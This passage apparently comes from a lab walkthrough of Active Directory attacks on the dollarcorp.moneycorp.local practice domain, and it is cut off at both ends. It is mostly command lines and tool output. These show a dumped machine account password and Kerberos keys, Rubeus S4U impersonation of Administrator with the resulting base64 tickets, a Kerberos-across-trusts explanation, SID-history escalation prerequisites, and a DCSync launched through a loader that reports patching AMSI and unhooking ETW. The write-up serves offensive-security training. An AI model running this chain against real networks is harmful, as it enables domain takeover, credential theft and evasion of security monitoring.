 * Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 24347 (00000000:00005f1b)

Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 8:03:03 AM
SID : S-1-5-96-0-1

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 999 (00000000:000003e7)

Session : UndefinedLogonType from 0
User Name : DCORP-STD163$
Domain : dcorp
Logon Server : (null)
Logon Time : 7/3/2024 8:03:03 AM
SID : S-1-5-18

* Username : dcorp-std163$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 58e2540d3c585257e36efe54009a6f2024c68dcced255254d25c4d0d812da2d2
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

We will now use the AES hash of the user dcorp-std163$ to impersonate a domain administrator to access
resources on the machine dcorp-mgmt.
C:\Windows\system32>C:\AD\Tools\Rubeus.exe s4u /user:DCORP-STD163$
/aes256:58e2540d3c585257e36efe54009a6f2024c68dcced255254d25c4d0d812da2d2
/impersonateuser:Administrator /msdsspn:http/dcorp-mgmt.dollarcorp.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash:

58e2540d3c585257e36efe54009a6f2024c68dcced255254d25c4d0d812da2d2
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\DCORP-STD163$'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
LmxvY2Fs

[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):

doIGVzCCBlOgAwIBBaEDAgEWooIFQTCCBT1hggU5MIIFNaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohowGKADAgEBoREwDxsNRENPUlAtU1REMTYzJKOCBPIwggTuoAMCARKhAwIBBKKCBOAE
ggTcyKwfrAU4LBP1zAk7eTzlXga2MrNfZxO/h5S6pLX+mNKDllzX7Iy2JxArjEmmRY+oIu5sSRmVMkNZ
MY63qm5xwRU9yzAOyJXBg0S1FfS4wTyirHv/XG066IuzZL1rRIVVOdkaN3fvz0n9iTM5O/Xl88VsQaAy
fU/qhMvGIo2sweRePwxeVT+vWqescXx5+aoqeftqwrhqYd26JX/aBAcSJcmESiWoGrX1/pdoZE334OXx
LlEXeXihER5Y3RtKC0W9quAWvlw2KuC4uzJ7fFFIy8R63fLGYAay9HDkp5yRUqiAZ83o86y5o4SX0LOa
w0OpP8tqqUDzYsjubBLFDa0Wqam1mhCtahAXFgUZNVfuQKYhjY5b2XC2LE7UOy/rJb3h/aA96ATViKGl
2ahO8e2A+6OLOBVm2z2ci+znwEg8uSPSp5VVIo23/uGv+jilHXTA+7f8gWKvF3BYox9Shbv4+n5SXOWW
FKm8WOhW72MsGt2L0WXdD3DoJp/wAuIxH3jtCSva+Pllco1BR5h0ewYJOecUIwz5F4CqxiPXoFPOnHWN
aLZ72uVgs4xtM0HukdxvRUJd/tCVEREkuR3OF4wEKftlNvpCAZXGJ8I/4L2El3mRtQ1ZqvFPH2RL1WKV
/cpdVALIhfZi6JOR/LWf7xPr8cK+EcpofmPrZm56HmtZo3YcfRv1fYpCu9USCGVQpTFVpz8Z9uKvvPg1
p2n2fAVxCh9SIr/ZaROCaOrQ2fbZlXBkpuQgw0H12dcvHegYryPY94BG28QXQICXGssymjvtryI1sgKF
RpMDcjxAaNQHdgNvjkBvRsKhUtaogvY/Q8yEq3bVWDIcAi6wxQ1rS92LwnEuMxTS69jigjgRoruCWl8Z
etG5mEN+C/79aqnytPwzSttnk6CVQARiS+2gBmVI+59Fi8Im8VvbYjNYF4cDLffwfZlz8zCwrtrVbq0r
+pJHCqGs/SHKQAYkJwwrVEARO37F01gqLZ4AiTqgZNerKruffdkpYLa2ag9QExW+R9yaq5Be5Ai8XLE1
sMG+hJwqrid29BVWRCaPEY0/X+GLdGqpjE3fAai7jvxUgdEwhF8Y/xkCe/B+H/faGlun8s9QSUp7elcp
auje5Q2gjWGTKeODsD4vAb7/rkJMtrDkulPKXofDTvJVIqZgEa7k0smkBJYWYXTeO68aFTro4UwhtoxQ
yCaX8QlOr9RHrTu2UrPftFhj0VFFk+s+SQ+VCqEJCmRs95GOESGoEC8WIY+fkU+GzJlnt+Y2jxry3dOR
yJtBcbp0d28ZcuqJSwqeFIEaPAervj2fM5Kh3oSPYnWU5boar2BjqELAzb8m9Rb1T3WUIMPjwG/dyZrz
YEv6sdCW0HQblVTBQrQ+4hi6b4Cvkq+3xgiWqBNx68YN+AXzQrJloSgckPluMkh3t8IJ5l+cyrLSngNw
Ig4Np6QQkT/FPRb6bCv62aD7Do69MBNddHXwmN6I5qHJS/iKHMjvlrQVLttMRwkospCnYyBtWjugj5vQ
gnNDs1Zmu4/dBc4Hs2AVFTJ+0N6mhTWZIJHaswoNCfVJqoEhZlDRpmRxUPUSRhmqR+S/kYbNU8Iw9AMD
TFD8eOy9eKgKBTPqbkNv7P005GQERyJrmvMKUil/gljhT2VLfRJMZt+woqyUg3ejggEAMIH9oAMCAQCi
gfUEgfJ9ge8wgeyggekwgeYwgeOgKzApoAMCARKhIgQgOf4kf7PnMd64MYOw2XL6O7Fyxjet0bSNrUhT
MUaUm4ahHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQqhETAPGw1BZG1pbmlzdHJh
dG9yowcDBQBAoQAApREYDzIwMjQwNzA0MTU1NDAzWqYRGA8yMDI0MDcwNTAxNTQwM1qnERgPMjAyNDA3
MTExNTU0MDNaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqRowGKADAgEBoREwDxsNRENPUlAt
U1REMTYzJA==

[*] Impersonating user 'Administrator' to target SPN 'http/dcorp-mgmt.dollarcorp.moneycorp.local'

[*] Building S4U2proxy request for service: 'http/dcorp-mgmt.dollarcorp.moneycorp.local'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'http/dcorp-mgmt.dollarcorp.moneycorp.local':

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
[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x2125aa

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: http/dcorp-mgmt.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/4/2024 8:54:03 (local)
End Time: 7/4/2024 18:54:03 (local)
Renew Time: 7/11/2024 8:54:03 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>winrs -r:dcorp-mgmt.dollarcorp.moneycorp.local whoami

dcorp\administrator

C:\Windows\system32>winrs -r:dcorp-mgmt.dollarcorp.moneycorp.local hostname

dcorp-mgmt
Cross Domain Attacks
Kerberos across trusts
In order for the user to access resources in another domain in the same forest, the Kerberos process
involves another layer since the KDC in one domain cannot issue a service ticket in another domain. Since
the service ticket can only be built using the target service’s password data and domain controllers contain
the password data for security principles in their domain, the DC does not have the target’s password data
and can’t create the TGS. In order to resolve this issue, there is a trust password between two domains in
the same forest used a bridge enabling Kerberos authentication across domains.

Once there is a trust between two domains, (domain BLUE and domain GREEN both are in the same AD
forest for this example), the ticket-granting service of each domain (“realm” in Kerberos speak) is
registered as a security principal with the other domain’s Kerberos service (KDC). This enables the ticket-
granting service in each domain to treat the one in the other domain as just another service providing
cross-domain service access for resources in the other domain.

1. AS-REQ:

Ticket request from the user (Domain BLUE) contains timestamp encrypted with the user’s password. The
Domain Controller receives the request and since the domain controller has access to all the passwords
in its own domain, it can decrypt the timestamp sent by the user and verifies if the timestamp is current.

2. AS-REP
The domain controller sends an User Ticket (TGT) and also a session key which is encrypted with the user’s
password. The TGT also contains the same session key. However it is encrypted with the krbtgt’s
password. The TGT is also encrypted with the krbtgt’s password. The user receives both the TGT and the
session key. Since the user doesn’t have access to the krbtgt’s password, it cannot decrypt the TGT. The
user decrypts the session key since it is encrypted with the user’s password.

3. Inter-Realm TGT

The user then sends a ticket request for the service in the another domain (Domain GREEN) to the domain
controller (Domain Blue). The DC (Domain Blue) initially checks its local database to determine if it hosts
the requested service and it cannot find the service in its domain. The DC (Domain Blue) queries the Global
Catalog. The Global catalog has the information about the service being hosted in Domain Green. Then it
checks if the domain Blue is trusted by Domain Green. Since the trusts between two domains within a
forest is two-way transitive, a referral is sent to the user to the Domain Green. After the referral, the KDC
in Domain BLUE initiates the inter-realm authentication process. As part of this process, it issues an inter-
realm Ticket Granting Ticket (TGT) to the user, specifically for accessing services within Domain GREEN.
When issuing the inter-realm TGT, the KDC in Domain BLUE signs it using the shared trust key between
Domain BLUE and Domain GREEN. This signature ensures the inter-realm TGT's authenticity and integrity.
The domain Controller (Domain Blue) then sends the inter-realm TGT and also a session key which is
encrypted with the user’s password. The user receives both the inter-realm TGT and also the session key.
The user decrypts the session key since it is encrypted with the user’s password.

4. TGS-REQ

The user then sends a ticket request for the service to the domain controller in Domain Green. The ticket
request contains the Inter-realm (TGT) which the user received in the previous step and an authenticator
which is encrypted with the session key obtained from the previous step. Now the domain controller
Green decrypts the Inter-realm TGT by using the trust key and obtains the session key. It now uses the
session key to decrypt the authenticator sent by the user.

5. TGS-REP

The Domain Controller Green sends a service ticket and a new session key to the user. The new session
key is also included in the service ticket but it is encrypted with the service account’s password. The service
ticket is also encrypted with the service account’s password. The new session key which is being sent
separately along with the service ticket is encrypted with the trust key. The user receives the service ticket
and the new session key and it obtains the new session key by decrypting it. The user cannot decrypt the
service ticket since the user does not have access to the service account’s password. The user decrypts
the session key included in the TGS-REP.

6. AP-REQ

The user sends the service ticket (which the user could not decrypt) which it obtained in the previous step
along with an authenticator to the service which it needs access to. The authenticator is encrypted with
the new session key which it obtained in the previous step. The service decrypts the service ticket using
the service account’s password and obtains the session key which it uses to decrypt the user’s
authenticator. The user is now authenticated to the service.
Privilege escalation to Enterprise Admins abusing SID history and trust key
SID History
The SID (Security Identifier) is a unique identifier that is assigned to each security principal (e.g. user,
group, computer). It is used to identify the principal within the domain and is used to control access to
resources.

The SID history is a property of a user or group object that allows the object to retain its SID when it is
migrated from one domain to another as part of a domain consolidation or restructuring. When an object
is migrated to a new domain, it is assigned a new SID in the target domain. The SID history allows the
object to retain its original SID, so that access to resources in the source domain is not lost.

SID History which allows a single user account to have multiple associated SID values.

For instance, the SID of an account with Domain Admin rights can be added to a normal user SID History
to grant them Domain Admin rights (the rights would not be granted per say, but the modified account
would be treated as domain admin when checking rights).

The SID history can be abused in two ways of escalating privileges within a forest.

Manipulating SID history requires domain administrator privileges in a target domain. If an adversary is
able to compromise a child domain within a forest, SID history can be manipulated to gain administrative
control of a parent domain.

Using a combination of PowerView and Mimikatz we can carry out a SID history attack using Windows.
The following details need to be gathered;

• The FQDN’s of the child and parent domains

• The child and parent domain’s SID values

• The RC4 or AES hash of the trust key

Getting the Domain SIDs of the domain and the parent domain
PS C:\Windows\system32> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648
PS C:\Windows\system32> Get-DomainSID -Domain moneycorp.local
S-1-5-21-335606122-960912869-3279953914

Getting the RC4 or AES hash of the trust key

DCSync attack
We need to execute DC sync attack and get the hash of the trust key. To execute a DCsync attack we need
Domain Admin Privileges.

We will open a command prompt with a domain administrator privilege.

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : OKA4EYW3
[*] Domain : PFDK92Z1
[*] Password : LYHS4E0B
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3276
[+] LUID : 0x14052ed

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 20992749
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x14052ed
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/4/2024 9:18:01 AM
EndTime : 7/4/2024 7:18:01 PM
RenewTill : 7/11/2024 9:18:01 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : az7QOLasLbeT2shWmTRwtIRfHHrZE62RdHyvmNv9izs=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt opens with the Domain Administrator privileges. We will now run the DCsync
attack to get the trust key.
C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:dcorp\mcorp$" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
